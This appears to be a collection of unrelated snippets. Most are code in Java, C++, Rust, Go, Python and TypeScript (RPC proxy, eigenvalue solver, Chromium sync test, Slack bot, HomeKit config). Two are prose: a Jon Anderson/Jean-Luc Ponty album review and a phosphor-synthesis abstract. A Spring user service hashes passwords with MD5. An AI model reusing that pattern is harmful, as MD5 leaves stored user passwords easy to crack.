/** * <p>Title : RpcClientProxy </p> * <p>Description : </p> * * @author huifer * @date 2019-06-11 */ public class RpcClientProxy { /** * Rpc客户端 * * @param interfaceCls 具体接口 {@link com.huifer.rmi.rpc.HelloService} * @param host host * @param port port * @return HelloServer 代理对象 */ public <T> T clientProxy(final Class<T> interfaceCls, final String host, final int port) { return (T) Proxy.newProxyInstance(interfaceCls.getClassLoader(), new Class[]{interfaceCls}, new RemoteInvocationHandler(host, port)); } }
/** * The <code>DispatcherSyntheticResource</code> extends the * <code>SyntheticResource</code> class overwriting the * {@link #getResourceSuperType()} method to provide a possibly non- * <code>null</code> result. */ private static class DispatcherSyntheticResource extends SyntheticResource { public DispatcherSyntheticResource(ResourceResolver resourceResolver, String path, String resourceType) { super(resourceResolver, path, resourceType); } @Override public String getResourceSuperType() { return ResourceUtil.getResourceSuperType(getResourceResolver(), getResourceType()); } }
/** * Clears a subtree rooted at the node with the given id that is * hosted in a given window. * * @param windowId The id of the hosting window. * @param rootNodeId The root id. */ private void clearSubTreeLocked(int windowId, long rootNodeId) { if (DEBUG) { Log.i(LOG_TAG, "Clearing cached subtree."); } LongSparseArray<AccessibilityNodeInfo> nodes = mNodeCache.get(windowId); if (nodes != null) { clearSubTreeRecursiveLocked(nodes, rootNodeId); } }
<filename>Google/OnlineRound19/B.cpp #include <iostream> #include <regex> #include <string> #include <vector> #include <sstream> using namespace std; bool compare(vector<int> &A, vector<int> &B) { // Returns true if A > B for(int i=0;i<A.size();i++) { if(A[i] > B[i]) { return true; } else if (A[i] < B[i]) { return false; } // Otherwise continue } // If the function reaches here, both the arrays are equal. However, since the elements are distinct, this will not happen return false; } vector<int> solution(vector<int> A, int K) { // O(N*K) solution where N = A.size() // Current maximum initialised to the first K element of array A vector<int> cur_max; for(int i=0;i<K;i++) { cur_max.push_back(A[i]); } // left and right stand for the first and last elements of the K-sized subarray for(int left = 1;left < A.size()-K+1;left++) { int right = left + K - 1; vector<int> temp; for(int j = left; j <= right; j++) { temp.push_back(A[j]); } if(compare(temp,cur_max)) { // Update cur_max as temp > cur_max cur_max = temp; } } return cur_max; } vector<int> toIntVector(string str) { std::vector<int> out; std::string i; std::istringstream tokenStream(str); while (std::getline(tokenStream, i, ',')) { out.push_back(atoi(i.c_str())); } return out; } string fromIntVector(vector<int> arr) { string out = ""; for (int i=0; i<arr.size(); i++) { out += to_string(arr[i]); if (i != arr.size() - 1) { out += ","; } } return out; } int main() { // Read from stdin, solve the problem, write answer to stdout. string arrS; int K; cin >> arrS >> K; vector<int> N = toIntVector(arrS); cout << fromIntVector(solution(N, K)); } /* Array X is greater than array Y if the first non-matching element in both arrays has a greater value in X than in Y. For example, for arrays X and Y such that: X = [1, 2, 4, 3, 5] Y = [1, 2, 3, 4, 5] X is greater than Y because the first element that does not match is larger in X (i.e. for X[2] and Y[2], X[2] > Y[2]). A contiguous subarray is defined by an interval of the indices. In other words, a contiguous subarray is a subarray which has consecutive indexes. Write a function that, given a zero-indexed array A consisting of N integers and an integer K, returns the largest contiguous subarray of length K from all the contiguous subarrays of length K. For example, given array A and K = 4 such that: A = [1, 4, 3, 2, 5] the function should return [4, 3, 2, 5], because there are two subarrays of size 4: [1, 4, 3, 2] [4, 3, 2, 5] and the largest subarray is [4, 3, 2, 5]. Assume that: 1 ≤ K ≤ N ≤ 100; 1 ≤ A[J] ≤ 1000; given an array A contains N distinct integers. In your solution, focus on correctness. The performance of your solution will not be the primary focus of the assessment. */
/** * <p> * An abstract base class for a {@link NodeHandler} implementation for {@link ImmutableNode} objects. * </p> * <p> * This class already implements all methods which need no other information than the passed in node object. * Functionality which requires additional state (e.g. querying the root node or a parent node) has to be added by * concrete sub classes. * </p> * * @since 2.0 */ abstract class AbstractImmutableNodeHandler implements NodeHandler<ImmutableNode> { @Override public String nodeName(final ImmutableNode node) { return node.getNodeName(); } @Override public Object getValue(final ImmutableNode node) { return node.getValue(); } @Override public List<ImmutableNode> getChildren(final ImmutableNode node) { return node.getChildren(); } @Override public <C> int getMatchingChildrenCount(final ImmutableNode node, final NodeMatcher<C> matcher, final C criterion) { return getMatchingChildren(node, matcher, criterion).size(); } /** * {@inheritDoc} This implementation returns an immutable list with all child nodes accepted by the specified matcher. */ @Override public <C> List<ImmutableNode> getMatchingChildren(final ImmutableNode node, final NodeMatcher<C> matcher, final C criterion) { final List<ImmutableNode> result = new ArrayList<>(node.getChildren().size()); for (final ImmutableNode c : node) { if (matcher.matches(c, this, criterion)) { result.add(c); } } return Collections.unmodifiableList(result); } /** * {@inheritDoc} This implementation returns an immutable list with all child nodes that have the specified name. */ @Override public List<ImmutableNode> getChildren(final ImmutableNode node, final String name) { return getMatchingChildren(node, NodeNameMatchers.EQUALS, name); } @Override public ImmutableNode getChild(final ImmutableNode node, final int index) { return node.getChildren().get(index); } @Override public int indexOfChild(final ImmutableNode parent, final ImmutableNode child) { return parent.getChildren().indexOf(child); } @Override public int getChildrenCount(final ImmutableNode node, final String name) { if (name == null) { return node.getChildren().size(); } return getMatchingChildrenCount(node, NodeNameMatchers.EQUALS, name); } @Override public Set<String> getAttributes(final ImmutableNode node) { return node.getAttributes().keySet(); } @Override public boolean hasAttributes(final ImmutableNode node) { return !node.getAttributes().isEmpty(); } @Override public Object getAttributeValue(final ImmutableNode node, final String name) { return node.getAttributes().get(name); } /** * {@inheritDoc} This implementation assumes that a node is defined if it has a value or has children or has attributes. */ @Override public boolean isDefined(final ImmutableNode node) { return AbstractImmutableNodeHandler.checkIfNodeDefined(node); } /** * Checks if the passed in node is defined. Result is <b>true</b> if the node contains any data. * * @param node the node in question * @return <b>true</b> if the node is defined, <b>false</b> otherwise */ static boolean checkIfNodeDefined(final ImmutableNode node) { return node.getValue() != null || !node.getChildren().isEmpty() || !node.getAttributes().isEmpty(); } }
def rand_int(*shape): res = np.random.randint(low=1, high=5, size=shape) if isinstance(res, np.ndarray): return res.astype(np.float32) return float(res)
/// Creates a random [`Ulid`] with the current timestamp, using a custom source of randomness. pub fn from_rng<R: Rng + ?Sized>(rng: &mut R) -> Self { // get the timestamp portion of the ulid let millis = Utc::now().timestamp_millis(); // create the buffer holding the raw bytes let mut buf = [0; 16]; // write the timestamp section into the buffer BigEndian::write_i48(&mut buf, millis); // fill the rest of the buffer with random bytes rng.fill(&mut buf[6..]); // construct the resulting ulid Ulid(buf) }
#include "eigs.h" #include "cotmatrix.h" #include "sort.h" #include "slice.h" #include "massmatrix.h" #include <iostream> template < typename Atype, typename Btype, typename DerivedU, typename DerivedS> IGL_INLINE bool igl::eigs( const Eigen::SparseMatrix<Atype> & A, const Eigen::SparseMatrix<Btype> & iB, const size_t k, const EigsType type, Eigen::PlainObjectBase<DerivedU> & sU, Eigen::PlainObjectBase<DerivedS> & sS) { using namespace Eigen; using namespace std; const size_t n = A.rows(); assert(A.cols() == n && "A should be square."); assert(iB.rows() == n && "B should be match A's dims."); assert(iB.cols() == n && "B should be square."); assert(type == EIGS_TYPE_SM && "Only low frequencies are supported"); DerivedU U(n,k); DerivedS S(k,1); typedef Atype Scalar; typedef Eigen::Matrix<typename DerivedU::Scalar,DerivedU::RowsAtCompileTime,1> VectorXS; // Rescale B for better numerics const Scalar rescale = std::abs(iB.diagonal().maxCoeff()); const Eigen::SparseMatrix<Btype> B = iB/rescale; Scalar tol = 1e-4; Scalar conv = 1e-14; int max_iter = 100; int i = 0; while(true) { // Random initial guess VectorXS y = VectorXS::Random(n,1); Scalar eff_sigma = 0; if(i>0) { eff_sigma = 1e-8+std::abs(S(i-1)); } // whether to use rayleigh quotient method bool ray = false; Scalar err = std::numeric_limits<Scalar>::infinity(); int iter; Scalar sigma = std::numeric_limits<Scalar>::infinity(); VectorXS x; for(iter = 0;iter<max_iter;iter++) { if(i>0 && !ray) { // project-out existing modes for(int j = 0;j<i;j++) { const VectorXS u = U.col(j); y = (y - u*u.dot(B*y)/u.dot(B * u)).eval(); } } // normalize x = y/sqrt(y.dot(B*y)); // current guess at eigen value sigma = x.dot(A*x)/x.dot(B*x); //x *= sigma>0?1.:-1.; Scalar err_prev = err; err = (A*x-sigma*B*x).array().abs().maxCoeff(); if(err<conv) { break; } if(ray || err<tol) { eff_sigma = sigma; ray = true; } Scalar tikhonov = std::abs(eff_sigma)<1e-12?1e-10:0; switch(type) { default: assert(false && "Not supported"); break; case EIGS_TYPE_SM: { SimplicialLDLT<SparseMatrix<Scalar> > solver; const SparseMatrix<Scalar> C = A-eff_sigma*B+tikhonov*B; //mw.save(C,"C"); //mw.save(eff_sigma,"eff_sigma"); //mw.save(tikhonov,"tikhonov"); solver.compute(C); switch(solver.info()) { case Eigen::Success: break; case Eigen::NumericalIssue: cerr<<"Error: Numerical issue."<<endl; return false; default: cerr<<"Error: Other."<<endl; return false; } const VectorXS rhs = B*x; y = solver.solve(rhs); //mw.save(rhs,"rhs"); //mw.save(y,"y"); //mw.save(x,"x"); //mw.write("eigs.mat"); //if(i == 1) //return false; break; } } } if(iter == max_iter) { cerr<<"Failed to converge."<<endl; return false; } if(i==0 || (S.head(i).array()-sigma).abs().maxCoeff()>1e-14) { U.col(i) = x; S(i) = sigma; i++; if(i == k) { break; } }else { // restart with new random guess. cout<<"RESTART!"<<endl; } } // finally sort VectorXi I; igl::sort(S,1,false,sS,I); sU = igl::slice(U,I,2); sS /= rescale; sU /= sqrt(rescale); return true; } #ifdef IGL_STATIC_LIBRARY // Explicit template specialization template bool igl::eigs<double, double, Eigen::Matrix<double, -1, -1, 0, -1, -1>, Eigen::Matrix<double, -1, 1, 0, -1, 1> >(Eigen::SparseMatrix<double, 0, int> const&, Eigen::SparseMatrix<double, 0, int> const&, unsigned long, igl::EigsType, Eigen::PlainObjectBase<Eigen::Matrix<double, -1, -1, 0, -1, -1> >&, Eigen::PlainObjectBase<Eigen::Matrix<double, -1, 1, 0, -1, 1> >&); #ifdef WIN32 template bool igl::eigs<double, double, Eigen::Matrix<double,-1,-1,0,-1,-1>, Eigen::Matrix<double,-1,1,0,-1,1> >(Eigen::SparseMatrix<double,0,int> const &,Eigen::SparseMatrix<double,0,int> const &,unsigned long long, igl::EigsType, Eigen::PlainObjectBase< Eigen::Matrix<double,-1,-1,0,-1,-1> > &, Eigen::PlainObjectBase<Eigen::Matrix<double,-1,1,0,-1,1> > &); #endif #endif
def fetch_mnist(): data_path = check_fetch_mnist() f = gzip.open(data_path, 'rb') try: train_set, valid_set, test_set = pickle.load(f, encoding="latin1") except TypeError: train_set, valid_set, test_set = pickle.load(f) f.close() return train_set, valid_set, test_set
#ifndef DQM_TRACKERREMAPPER_PHASE1PIXELMAPS_H #define DQM_TRACKERREMAPPER_PHASE1PIXELMAPS_H #include "TH2Poly.h" #include "TGraph.h" #include "TH1.h" #include "TH2.h" #include "TStyle.h" #include "TCanvas.h" #include <fmt/printf.h> #include <fstream> #include <boost/tokenizer.hpp> #include <boost/range/adaptor/indexed.hpp> #include "FWCore/ParameterSet/interface/FileInPath.h" #include "FWCore/MessageLogger/interface/MessageLogger.h" #include "CalibTracker/StandaloneTrackerTopology/interface/StandaloneTrackerTopology.h" #ifndef PHASE1PIXELMAP_STANDALONE #define LOGDEBUG(x) LogDebug(x) #else #define LOGDEBUG(x) std::cout << x << ": " #endif using indexedCorners = std::map<unsigned int, std::pair<std::vector<float>, std::vector<float>>>; /*-------------------------------------------------------------------- / Ancillary class to build pixel phase-1 tracker maps /--------------------------------------------------------------------*/ class Phase1PixelMaps { public: Phase1PixelMaps(const char* option) : m_option{option}, m_isBooked{std::make_pair(false, false)}, m_knownNames{{}}, m_trackerTopo{StandaloneTrackerTopology::fromTrackerParametersXMLFile( edm::FileInPath("Geometry/TrackerCommonData/data/PhaseI/trackerParameters.xml").fullPath())} { // set the rescale to true by default m_autorescale = true; // store the file in path for the corners (BPIX) for (unsigned int i = 1; i <= 4; i++) { m_cornersBPIX.push_back(edm::FileInPath(Form("DQM/SiStripMonitorClient/data/Geometry/vertices_barrel_%i", i))); } // store the file in path for the corners (BPIX) for (int j : {-3, -2, -1, 1, 2, 3}) { m_cornersFPIX.push_back(edm::FileInPath(Form("DQM/SiStripMonitorClient/data/Geometry/vertices_forward_%i", j))); } } ~Phase1PixelMaps() = default; // set of no rescale inline void setNoRescale() { m_autorescale = false; } // set option, but only if not already set void resetOption(const char* option); // book them all void book(const std::string& currentHistoName, const char* what, const char* zaxis); // booking methods void bookBarrelHistograms(const std::string& currentHistoName, const char* what, const char* zaxis); void bookForwardHistograms(const std::string& currentHistoName, const char* what, const char* zaxis); // fill them all void fill(const std::string& currentHistoName, unsigned int id, double value); // filling methods void fillBarrelBin(const std::string& currentHistoName, unsigned int id, double value); void fillForwardBin(const std::string& currentHistoName, unsigned int id, double value); // beautification methods void beautifyAllHistograms(); void setBarrelScale(const std::string& currentHistoName, std::pair<float, float> extrema); void setForwardScale(const std::string& currentHistoName, std::pair<float, float> extrema); // drawing methos void drawBarrelMaps(const std::string& currentHistoName, TCanvas& canvas, const char* drawOption = nullptr); void drawForwardMaps(const std::string& currentHistoName, TCanvas& canvas, const char* drawOption = nullptr); void drawSummaryMaps(const std::string& currentHistoName, TCanvas& canvas, const char* drawOption = nullptr); private: Option_t* m_option; bool m_autorescale; std::pair<bool, bool> m_isBooked; std::vector<std::string> m_knownNames; TrackerTopology m_trackerTopo; std::map<uint32_t, std::shared_ptr<TGraph>> bins, binsSummary; std::map<std::string, std::vector<std::shared_ptr<TH2Poly>>> pxbTh2PolyBarrel; std::map<std::string, std::shared_ptr<TH2Poly>> pxbTh2PolyBarrelSummary; std::map<std::string, std::vector<std::shared_ptr<TH2Poly>>> pxfTh2PolyForward; std::map<std::string, std::shared_ptr<TH2Poly>> pxfTh2PolyForwardSummary; std::vector<edm::FileInPath> m_cornersBPIX; std::vector<edm::FileInPath> m_cornersFPIX; const indexedCorners retrieveCorners(const std::vector<edm::FileInPath>& cornerFiles, const unsigned int reads); // called by book histograms void bookBarrelBins(const std::string& currentHistoName); void bookForwardBins(const std::string& currentHistoName); // graphics void makeNicePlotStyle(TH1* hist); void adjustCanvasMargins(TVirtualPad* pad, float top, float bottom, float left, float right); void rescaleAllBarrel(const std::string& currentHistoName); void rescaleAllForward(const std::string& currentHistoName); }; #endif
// Verifies that managed bookmarks (installed by policy) don't get synced. IN_PROC_BROWSER_TEST_F(TwoClientBookmarksSyncTest, ManagedBookmarks) { policy_provider_.SetDefaultReturns( true, true); policy::PushProfilePolicyConnectorProviderForTesting(&policy_provider_); ASSERT_TRUE(SetupSync()) << "SetupSync() failed."; const BookmarkNode* managed_node0 = GetManagedNode(0); ASSERT_TRUE(managed_node0->children().empty()); ASSERT_FALSE(managed_node0->IsVisible()); const BookmarkNode* managed_node1 = GetManagedNode(1); ASSERT_TRUE(managed_node1->children().empty()); ASSERT_FALSE(managed_node1->IsVisible()); const BookmarkNode* bar_node0 = GetBookmarkBarNode(0); ASSERT_TRUE(bar_node0->children().empty()); ASSERT_TRUE(bar_node0->IsVisible()); const BookmarkNode* bar_node1 = GetBookmarkBarNode(1); ASSERT_TRUE(bar_node1->children().empty()); ASSERT_TRUE(bar_node1->IsVisible()); const GURL google_url("http://www.google.com"); ASSERT_NE(nullptr, AddURL(0, "Google", google_url)); ASSERT_TRUE(BookmarksMatchChecker().Wait()); ASSERT_EQ(1u, bar_node0->children().size()); ASSERT_EQ(1u, bar_node1->children().size()); base::Value bookmark(base::Value::Type::DICTIONARY); bookmark.SetStringKey("name", "Managed bookmark"); bookmark.SetStringKey("url", "youtube.com"); base::Value list(base::Value::Type::LIST); list.Append(std::move(bookmark)); policy::PolicyMap policy; policy.Set(policy::key::kManagedBookmarks, policy::POLICY_LEVEL_MANDATORY, policy::POLICY_SCOPE_USER, policy::POLICY_SOURCE_CLOUD, std::move(list), nullptr); policy_provider_.UpdateChromePolicy(policy); base::RunLoop().RunUntilIdle(); ASSERT_NE(nullptr, AddURL(0, "Google 2", google_url)); ASSERT_TRUE(BookmarksMatchChecker().Wait()); ASSERT_THAT(GetBookmarkBarNode(0)->children(), Contains(IsUrlBookmarkWithTitleAndUrl("Google 2", google_url))); EXPECT_FALSE(GetSyncService(0)->HasUnrecoverableError()); EXPECT_FALSE(GetSyncService(1)->HasUnrecoverableError()); ASSERT_EQ(1u, managed_node0->children().size()); ASSERT_TRUE(managed_node0->IsVisible()); EXPECT_EQ(GURL("http://youtube.com/"), managed_node0->children().front()->url()); ASSERT_EQ(0u, managed_node1->children().size()); }
Anderson Ponty Band – Better Late Than Never Article by: Tony Colvill Somewhere around 1980, Jon Anderson approached Jean-Luc Ponty with a view to a collaboration. Now, over thirty years later, the man from Accrington and the man from Avranches, two very different environments, have finally got together. The album was recorded live in Aspen, Colorado, which goes some way to explain the sound and feel, and then tweaked in the studio. I looked forward to this album when I first heard of its planned release, and overall it has not disappointed. I always considered Yes to have a jazz element, particularly in their early work, and combining this with former Frank Zappa musician and credible artiste in his own right Jean-Luc Ponty seemed to me to create an interesting combination.  So let’s get the gripes out of the way. Just two really; in an album of covers of Yes material, Jean-Luc material and a couple of new bits, it’s not bad but although a cover must bring something new to a song it should not slaughter what are essentially sacred cows. So what, in my view, went to the abattoir? Firstly, Time and a Word, a song with a lot of feeling, pathos if you will, all the sentiment and meaning is lost in a cod reggae version. Don’t get me wrong, in a live environment this may actually work. I recall seeing Fairport Convention doing a reggae style Matty Groves live and it was really enjoyable, but, for me, this does not. Professionally done with good musicianship, but the heart of the song, gone. Similarly, Wondrous Stories, a song which when performed by Yes (and Jon) is just plain enjoyable. The album opens with an intro, this is the band statement and as such delivers some promise before moving into the first track, One in the Rhythm of Hope, a blending of J-LP’s Rhythm of Hope and “Yesisms”. It works well, Anderson’s voice reaches its heights and Ponty’s violin provides a jazz feel. This is much a pattern for the album, Yes revisited, a merging of Yes and J-LP with a few new bits. A for Aria is a lovely piece, it has the feeling that the reggae version of Time and A Word has lost to my ears. Jon, although the voice is older, can still sound as powerful and emotive as ever. Other tracks hit these high points too, most markedly Listening with Me and Soul Eternal. Owner of a Lonely Heart works for me, it has had some of the eighties bombast removed but still manages to retain the shape and feeling of the original, violin substituting for the guitar work of Trevor Rabin does not devalue the song so a thumbs up from me on this one. Infinite Mirage blends the rock and jazz influences but also manages a poppy feel with a distinct live element. Overall it is a strange album, part rock, part jazz, part lounge, an occasional indulgence (eek!), some even meriting owning, especially in the current presence of a wayward studio Yes. Soul Eternal is what Wonderous Stories could have been, a track filled with hope and the expectations that I have of a classic Yes track. My perspective on this is mainly as a Yes rock fan, and much as I love my jazz too, I have not exposed myself to a lot of J-LP’s back catalogue, I will however make it a mission to explore. And You & I is almost a straight Yes cover, if covering your own material is in fact a cover. It’s fine, it works, and nothing of its essence is lost. Unlike the jazz lounge Wonderous Stories, not far from Alas Smith & Jones and now the tears of laughter fall. Though currently sat in the shed with a glass of merlot and Wonderous Stories playing, it is not as offensive as on first listen. Merlot mellows the savage ear… Renaissance of the Sun is one of the jointly composed pieces and it’s very very nice. First sound of the audience. Yup, the merlot is working, feeling very chilled with this piece, can recommend it for late night chilling. Roundabout is a mad and crazy jazzed up version of the Yes classic, this is what a musical conglomeration should be, a little from both, losing nothing and adding a different edge to get close to. And it would seem that the band finally express themselves freely. Long time coming for a live recording. I See You Messenger and the last track, New New World, show the true potential of this project and I do hope they have another go but with more new material. It was recorded live, and I wonder if the DVD that accompanies the deluxe version of the album gives more life to the performance, in particular those two tracks that disappoint me. Perhaps with movement and cheesy grins they become more than party pieces. Sadly, the review copy is just audio so I may never know. The production values are good, something that seemed to be missing from the last Yes studio album. I think that if you like Jon with Yes, Jean-Luc Ponty and a little jazz orientated music, yours to own will be no disgrace. Some tracks will happily go on to a prog mix for the car, others…. If this is the first of a few from Anderson Ponty then it is a good start. 30 years in the making, but a good start. TRACK LISTING 01. Band Intro (1:17) 02. One in the Rhythm of Hope (4:34) 03. A for Aria (3:22) 04. Owner of a Lonely Heart (5:04) 05. Listening with Me (5:39) 06. Time and a Word (5:30) 07. Infinite Mirage (3:48) 08. Soul Eternal (4:58) 09. Wonderous Stories (4:01) 10. And You and I (3:00) 11. Renaissance of the Sun (6:36) 12. Roundabout (5:27) 13. I See You Messenger (3:50) 14. New New World (3:46) Total time – 60:52 MUSICIANS Jon Anderson – Vocals, Guitar Jean-Luc Ponty – Violin Jamie Glaser – Guitars Wally Minko – Keyboards Baron Browne – Bass Rayford Griffin – Drums & Percussion ADDITIONAL INFO Record Label: Ear Music Year Of Release: 2015 LINKS Anderson Ponty Band: Website | Facebook Jon Anderson: Website | Facebook Jean-Luc Ponty: Website
def aggregate(self, inputs, index): return scatter(inputs, index, dim=self.node_dim, reduce=self.aggr)
package com.july.springboot.service.impl; import com.july.springboot.mapper.UserMapper; import com.july.springboot.model.entity.User; import com.july.springboot.model.json.UserJson; import com.july.springboot.service.UserService; import com.july.springboot.util.PasswordUtil; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.stereotype.Service; /** * Created by Noageir * Date: 2017/7/21. */ @Service public class UserServiceImpl implements UserService { @Autowired private UserMapper userMapper; @Override public boolean addUserInfo(User user) { //TODO 增加注册接口 String passWd = user.getPassWord(); user.setPassWord(PasswordUtil.EncoderByMd5(passWd)); return false; } @Override public UserJson queryUserInfo(User user) { return userMapper.queryUserInfo(user); } }
import { Directive } from '@angular/core'; import { Object3D } from 'three'; import { GLTF, GLTFLoader } from 'three/examples/jsm/loaders/GLTFLoader'; import { ThLoader } from './ThLoader'; @Directive({ selector: '[loadGLTF]' }) // eslint-disable-next-line @angular-eslint/directive-class-suffix export class ThGLTFLoader extends ThLoader<GLTF> { public loaderFn = async ( input?: string, onProgress?: (progress: ProgressEvent) => void, onLoaded?: (res: GLTF) => void ): Promise<Object3D> => { if (!input) { throw new Error('missing input url'); } const loader = new GLTFLoader(); const result: GLTF = await loader.loadAsync(input, onProgress); if (onLoaded) { onLoaded(result); } return result.scene; }; }
<reponame>mctofu/homek package config import ( "bytes" "encoding/json" "fmt" "io/ioutil" "os" "path" "github.com/mctofu/homekit/client" ) // ControllerConfig details a controller and its pairings type ControllerConfig struct { Name string DeviceID string PublicKey []byte PrivateKey []byte AccessoryPairings []*AccessoryPairing } // AccessoryPairing details a paired accessory type AccessoryPairing struct { Name string DeviceName string Model string DeviceID string PublicKey []byte IPConnectionInfo client.IPConnectionInfo } // ReadControllerConfig reads the ControllerConfig for a controller with the given name // stored under the configPath directory func ReadControllerConfig(configPath string, name string) (*ControllerConfig, error) { data, err := ioutil.ReadFile(path.Join(configPath, name+".json")) if err != nil { return nil, err } var cfg ControllerConfig if err := json.Unmarshal(data, &cfg); err != nil { return nil, fmt.Errorf("parse config: %v", err) } return &cfg, nil } // SaveControllerConfig writes the ControllerConfig for a controller with the given name // under the configPath directory. An error is returned if a config for the controller // already exists unless the overwrite flag is set. func SaveControllerConfig(configPath string, cfg *ControllerConfig, overwrite bool) error { filePath := path.Join(configPath, cfg.Name+".json") if !overwrite { if _, err := os.Stat(filePath); err == nil { return fmt.Errorf("%s already exists", filePath) } else if !os.IsNotExist(err) { return err } } if err := os.MkdirAll(configPath, 0700); err != nil { return err } var output bytes.Buffer encoder := json.NewEncoder(&output) encoder.SetIndent("", " ") if err := encoder.Encode(cfg); err != nil { return err } if err := WriteConfig(filePath, output.Bytes()); err != nil { return err } return nil } // WriteConfig writes data to path but first writes it to a temporary file // to avoid errors where the write fails & the data from the original config // is lost. func WriteConfig(path string, data []byte) error { tempPath := path + ".new" if err := ioutil.WriteFile(tempPath, data, 0600); err != nil { return fmt.Errorf("write temp: %v", err) } if _, err := os.Stat(path); !os.IsNotExist(err) { if err := os.Remove(path); err != nil { return fmt.Errorf("remove existing: %v", err) } } if err := os.Rename(tempPath, path); err != nil { return fmt.Errorf("rename: %v", err) } return nil }
Characterization of zinc magnesium stannate phosphor fine particles synthesized by electromagnetic wave heating Electromagnetic wave heating has drawn much attention in material processing. This method is possible in using materials with the dielectric loss in the corresponding wavelength region. The merits are quick response and uniformity of heating due to inner exothermic reaction . These features suggest the possibility that electromagnetic wave heating facilitate the control of particle size in the synthesis of phosphors. On the other hand, it has been reported that stannates are easily synthesized by microwave heating . Among these compounds, zinc stannate (Zn2SnO4) is expected as the host material of phosphors for FED and EL devices, because of its semiconducting property in electrical conductivity . In the present study, we have tried to synthesize the fine particles of Mn2+-doped (Zn, Mg)SnO4 phosphor by using the 28 GHz high-power electromagnetic wave irradiation system at the FIR center in University of Fukui. Properties of the samples synthesized by the millimeter-wave heating are compared with those by the electric furnace heating. On the basis of comparisons, the advantage of electromagnetic heating in the development of phosphors is found.
#!/usr/bin/env python import os import re PROJECT_DIRECTORY = os.path.realpath(os.path.curdir) if __name__ == '__main__': cf_template_file = "%s/cloudformation/{{ cookiecutter.cloudformation_template_name }}.yml.tpl" % PROJECT_DIRECTORY cf_template_name = "{{ cookiecutter.cloudformation_template_name }}" cf_template_description = "{{ cookiecutter.cloudformation_template_description }}" cf_template_version = "{{ cookiecutter.version }}" r = re.compile(r"\%\%(\S+)\%\%") with open(cf_template_file, "r") as f: lines = f.readlines() with open(cf_template_file, "w") as f: for l in lines: m = r.search(l) if m: if m.group() == "%%cookiecutter.cloudformation_template_name%%": _l = r.sub(cf_template_name, l) f.write(_l) elif m.group() == "%%cookiecutter.cloudformation_template_description%%": _l = r.sub(cf_template_description, l) f.write(_l) elif m.group() == "%%cookiecutter.version%%": _l = r.sub(cf_template_version, l) f.write(_l) else: f.write(l)
class IgfBasicSlackBot: ''' A basic slack bot for IGF specific operations required params: slack_config_json: A json file containing slack api keys project_data_file: A csv file containing project data usage: - create bot bot=IgfBasicSlackBot(slack_config_json, project_data_file) - start bot bot.start_igfslackbot() ''' def __init__(self,slack_config_json, project_data_file): self.project_data_file=project_data_file self.igf_slack=IGF_slack(slack_config=slack_config_json) # create slack client instance @staticmethod def _get_project_status(project_igf_id,data_file,output_file): ''' A static method for fetching project status required params: project_igf_id: A project igf id data_file: A csv file containing project data output_file: An output png filepath ''' try: message=None data=pd.read_csv(data_file) data=data[data['project_igf_id']==project_igf_id] if len(data.index) >0: data=data.groupby(['sample_igf_id','seqrun_igf_id']).sum() data=data.reset_index(level=['seqrun_igf_id']) fig, ax=plt.subplots() ax=sns.barplot(data=data,\ y='attribute_value',\ x=data.index,\ hue='seqrun_igf_id') #ax.legend(bbox_to_anchor=(1.8, 1)) plt.xticks(fontsize=8,rotation=30) plt.savefig(output_file) else: message='project id {0} not found'.format(project_igf_id) return output_file, message except: raise @staticmethod def _calculate_reply(user_input,project_data): ''' A static method for calculation reply for the user input required params: user_input: A user input string from slack message project_data: A project data csv file ''' try: file_plot=None pattern=re.compile(r'^<@\w+>(\s+)?(\S+)(\s+)?:(\s+)?(\S+)$') m = re.search(pattern,user_input) if m: key=m.group(2) value=m.group(5) if key.lower()=='project': tmp_dir=get_temp_dir() file_plot, msg=IgfBasicSlackBot.\ _get_project_status(project_igf_id=value,\ data_file=project_data,\ output_file=os.path.join(tmp_dir,'project_data.png')) else: msg='No option present for keyword {0}, available options are: project'.\ format(key) else: msg='No match found, available options are: project' return file_plot,msg except: raise @staticmethod def _parse_slack_output(slack_rtm_output, bot_id, channel_id): ''' A static method for parsing slack realtime output required_params: slack_rtm_output: slack realtime stream bot_id: slack bot id channel_id: slack channel id ''' try: if isinstance(slack_rtm_output, list) and \ len(slack_rtm_output) > 0: for output in slack_rtm_output: if output and \ 'text' in output and \ '@'+bot_id in output['text'] and \ channel_id in output['channel']: yield output except: raise def start_igfslackbot(self): ''' A method for starting Basic slackbot ''' try: igf_slack=self.igf_slack if igf_slack.slackobject.rtm_connect(): while True: for output in self._parse_slack_output(slack_rtm_output=igf_slack.slackobject.rtm_read(), bot_id=igf_slack.slack_bot_id, channel_id=igf_slack.slack_channel_id): file_plot,message=self._calculate_reply(user_input=output['text'],\ project_data=self.project_data_file) if message is None: igf_slack.post_file_to_channel(filepath=file_plot, thread_ts=output['ts']) else: igf_slack.post_message_to_channel_thread(message=message, thread_id=output['ts']) except KeyboardInterrupt: print('Stopped bot') except: raise
<reponame>aimed/frosty<gh_stars>1-10 import { Connection } from 'typeorm'; import { Container } from 'typedi'; import { Fridge } from '../fridge/Fridge'; import { ShoppingList } from '../shoppinglist/ShoppingList'; import { User } from '../user/User'; import { getDeterministicString } from './getDeterministicString'; export async function createNewTestUser(connection: Connection = Container.get(Connection)) { if (!process.env.PASSWORDS_PEPPER) { process.env.PASSWORDS_PEPPER = '<PASSWORD>'; } const users = connection.getRepository(User); const email = getDeterministicString() + '@example.com'; const password = await User.hashPassword('password'); const user = users.create({ email, password }); user.fridge = Promise.resolve(new Fridge()); user.shoppingList = Promise.resolve(new ShoppingList()); await users.save(user); return user; }
import {IoNode, RegisterIoNode, ListenersDeclaration, EventDispatcher} from '../../iogui.js'; const handlerFunction = () => {}; class IoNode1 extends IoNode { handler1Count = 0; handler1Detail?: string; static get Listeners(): ListenersDeclaration { return { 'event1': 'handler1', }; } handler1(event: CustomEvent) { this.handler1Count++; this.handler1Detail = event.detail; } } RegisterIoNode(IoNode1); class IoNode2 extends IoNode1 { handler2Count = 0; handler3Count = 0; handler2Detail?: string; handler3Detail?: string; static get Listeners(): ListenersDeclaration { return { 'event2': ['handler2', {capture: true}], }; } handler2(event: CustomEvent) { this.handler2Count++; this.handler2Detail = event.detail; } handler3(event: CustomEvent) { this.handler3Count++; this.handler3Detail = event.detail; } } RegisterIoNode(IoNode2); class IoNode3 extends IoNode2 { static get Listeners(): ListenersDeclaration { return { 'event1': 'handler3', 'event2': [handlerFunction, {passive: true}], 'event3': handlerFunction }; } } RegisterIoNode(IoNode3); class TestDivEventDispatchElement extends HTMLElement { handler3Count = 0; handler3Detail?: string; handler3(event: CustomEvent) { this.handler3Count++; 